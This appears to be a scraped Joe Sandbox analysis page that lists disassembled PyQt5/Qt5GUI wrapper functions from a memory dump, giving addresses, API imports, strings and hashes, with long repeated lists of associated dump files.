Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setPen@@Width
String ID: QPen$setWidthF$setWidthF(self, width: float)
API String ID: 2145825199-1341275970
Opcode ID: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
Instruction ID: 5e0c658ca16d78cc340b7f72f002a44b28292a71c823949516a9d991d7340c06
Opcode Fuzzy Hash: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
Instruction Fuzzy Hash: 6B1115B5A08F56C1EB10DF25E8886A933B8FB45B84FA140B2CA0D43320DF7DD95AC740

Function 00007FFB9A339F10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setCurveThreshold@QPainterPathStroker@@QEAAXN@Z.QT5GUI ref: 00007FFB9A339F69

Strings

setCurveThreshold, xrefs: 00007FFB9A339F98
QPainterPathStroker, xrefs: 00007FFB9A339F9F
setCurveThreshold(self, threshold: float), xrefs: 00007FFB9A339F8C

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setCurvePainterPathStroker@@Threshold@
String ID: QPainterPathStroker$setCurveThreshold$setCurveThreshold(self, threshold: float)
API String ID: 2833657433-2098193841
Opcode ID: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
Instruction ID: ddf3c7085e395080b0dc7c26911eaa8b06e3dbc66e6dd7189d96949b60aee031
Opcode Fuzzy Hash: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
Instruction Fuzzy Hash: D11127B5A08E46C1EB60DF20E8886A933B8FB44B84FA240B2CA1D43320DF7DD55AC740

Function 00007FFB9A325AA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setAlphaBufferSize@QSurfaceFormat@@QEAAXH@Z.QT5GUI ref: 00007FFB9A325AF7

Strings

setAlphaBufferSize(self, size: int), xrefs: 00007FFB9A325B1A
QSurfaceFormat, xrefs: 00007FFB9A325B2D
setAlphaBufferSize, xrefs: 00007FFB9A325B26

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setAlphaBufferFormat@@Size@Surface
String ID: QSurfaceFormat$setAlphaBufferSize$setAlphaBufferSize(self, size: int)
API String ID: 3682934702-1963592284
Opcode ID: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
Instruction ID: b5420190a8056e15dc1f5c732d15b8ff7dff205edd907b3a5a2989d7fd7e95f4
Opcode Fuzzy Hash: 4c21275f77da6cb3fbcc058cb3f3b7a9d0fde10fea4944c05a0257792545f041
Instruction Fuzzy Hash: 1A113CB5A18E57C1EB10DF24E8886A933B9FB48B84F914072CA4D03320DF7DD54AC740

Function 00007FFB9A353AD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?removeColumn@QStandardItem@@QEAAXH@Z.QT5GUI ref: 00007FFB9A353B27

Strings

QStandardItem, xrefs: 00007FFB9A353B5D
removeColumn, xrefs: 00007FFB9A353B56
removeColumn(self, column: int), xrefs: 00007FFB9A353B4A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?removeColumn@Item@@Standard
String ID: QStandardItem$removeColumn$removeColumn(self, column: int)
API String ID: 2771442086-3921793217
Opcode ID: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
Instruction ID: b6676a8e234dde296b53bfd1a5a8687fdb42672e8904201ae305eea250cb492f
Opcode Fuzzy Hash: adcc2b2aeecedbd0562ea63310394f5fce69d6fffcbfbe064dbb5b35cf5d1cd9
Instruction Fuzzy Hash: BA113CB5A18F56C1EB10DF25E8886A933B8FB48B84F914172CA5D03320CF7DD54AC700

Function 00007FFB9A339C00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setUseHoverEffects@QStyleHints@@QEAAX_N@Z.QT5GUI ref: 00007FFB9A339C58

Strings

setUseHoverEffects, xrefs: 00007FFB9A339C87
setUseHoverEffects(self, useHoverEffects: bool), xrefs: 00007FFB9A339C7B
QStyleHints, xrefs: 00007FFB9A339C8E

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setEffects@Hints@@HoverStyle
String ID: QStyleHints$setUseHoverEffects$setUseHoverEffects(self, useHoverEffects: bool)
API String ID: 605048413-232271908
Opcode ID: db3dc08d6d01fed9d39a4130473fd6da699475ca74a0748ca70893fd6987e409
Instruction ID: f44c06ae793d4b1a69c14aec1c5387045e42b196db36013a3667868a8cc016f2
Opcode Fuzzy Hash: db3dc08d6d01fed9d39a4130473fd6da699475ca74a0748ca70893fd6987e409
Instruction Fuzzy Hash: 221115B5A18E56C1EB10DF21E8886A933A9FB49B88FA141B6CA5D03320DF7DD50AC700

Function 00007FFB9A32FBA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setTableCellRowSpan@QTextCharFormat@@QEAAXH@Z.QT5GUI ref: 00007FFB9A32FBF7

Strings

QTextCharFormat, xrefs: 00007FFB9A32FC2D
setTableCellRowSpan, xrefs: 00007FFB9A32FC26
setTableCellRowSpan(self, atableCellRowSpan: int), xrefs: 00007FFB9A32FC1A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setCellCharFormat@@Span@TableText
String ID: QTextCharFormat$setTableCellRowSpan$setTableCellRowSpan(self, atableCellRowSpan: int)
API String ID: 3229484481-4206450995
Opcode ID: 6dc654285f43effb2b4f718c12fbbe69a9b656c465b54825209b180c8ef7cec5
Instruction ID: b42853223627fcdee6c09ade7210c5f78264553a5b52ed7db4e5c36aa0007994
Opcode Fuzzy Hash: 6dc654285f43effb2b4f718c12fbbe69a9b656c465b54825209b180c8ef7cec5
Instruction Fuzzy Hash: 441130B5B18E56C1EB10DF20E8886A933B8FB58B84F614172CA4D03320DF7DD55AC740

Function 00007FFB9A307BF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setVerticalMovementX@QTextCursor@@QEAAXH@Z.QT5GUI ref: 00007FFB9A307C47

Strings

setVerticalMovementX, xrefs: 00007FFB9A307C76
setVerticalMovementX(self, x: int), xrefs: 00007FFB9A307C6A
QTextCursor, xrefs: 00007FFB9A307C7D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setCursor@@MovementTextVertical
String ID: QTextCursor$setVerticalMovementX$setVerticalMovementX(self, x: int)
API String ID: 2084158599-1590260451
Opcode ID: 7e147756e4b8010aa7f5610fd67e8f7a68cb1b8d6024dd53e30f89012841eb1c
Instruction ID: c78906308ab1ccdaae22657f1fe95790d76b9d9a9f4bb4318d8407548831d92f
Opcode Fuzzy Hash: 7e147756e4b8010aa7f5610fd67e8f7a68cb1b8d6024dd53e30f89012841eb1c
Instruction Fuzzy Hash: FC113CB5B18E56C1EB10DF21E8886A933B8FB48B84F914172CA4C43320CF7DD54AC740

Function 00007FFB9A34DC50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setDropEnabled@QStandardItem@@QEAAX_N@Z.QT5GUI ref: 00007FFB9A34DCA8

Strings

setDropEnabled, xrefs: 00007FFB9A34DCD7
QStandardItem, xrefs: 00007FFB9A34DCDE
setDropEnabled(self, dropEnabled: bool), xrefs: 00007FFB9A34DCCB

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setDropEnabled@Item@@Standard
String ID: QStandardItem$setDropEnabled$setDropEnabled(self, dropEnabled: bool)
API String ID: 3209070438-2807213632
Opcode ID: 8f30c8c65d1374bc3ead2048ca946199f63d4eda7d6ddba379547aee9f0f4f93
Instruction ID: f4493ba3ab12cf8f161826f7bb1f0f4c95d329f346935d7dc86017b2d1d08676
Opcode Fuzzy Hash: 8f30c8c65d1374bc3ead2048ca946199f63d4eda7d6ddba379547aee9f0f4f93
Instruction Fuzzy Hash: 3F1139B5A1CE56C1EB10DF21E8886A933B8FB48B88F9140B6CA5D03320CF7DD94AC700

Function 00007FFB9A34BC50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

?setCheckable@QStandardItem@@QEAAX_N@Z.QT5GUI ref: 00007FFB9A34BCA8

Strings

setCheckable, xrefs: 00007FFB9A34BCD7
setCheckable(self, checkable: bool), xrefs: 00007FFB9A34BCCB
QStandardItem, xrefs: 00007FFB9A34BCDE

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?setCheckable@Item@@Standard
String ID: QStandardItem$setCheckable$setCheckable(self, checkable: bool)
API String ID: 1326048647-3214107262
Opcode ID: f27461965f3bc925f05a99419965322310b01ae426d647abb52efb5d82064fce
Instruction ID: 769c63d202aed6b1913afd03a3ea14e2066205ef75be96639e53e68337cf8cc9
Opcode Fuzzy Hash: f27461965f3bc925f05a99419965322310b01ae426d647abb52efb5d82064fce
Instruction Fuzzy Hash: A31139B5A18E56C1EB10DF25E8886A933B8FB58B88F9140B6CA4D03320DF3DD95AC700

Function 00007FFB9A35BBA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

?device@QTextDocumentWriter@@QEBAPEAVQIODevice@@XZ.QT5GUI ref: 00007FFB9A35BBEB

Strings

device, xrefs: 00007FFB9A35BC23
QTextDocumentWriter, xrefs: 00007FFB9A35BC2A
device(self) -> Optional[QIODevice], xrefs: 00007FFB9A35BC17

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?device@Device@@DocumentTextWriter@@
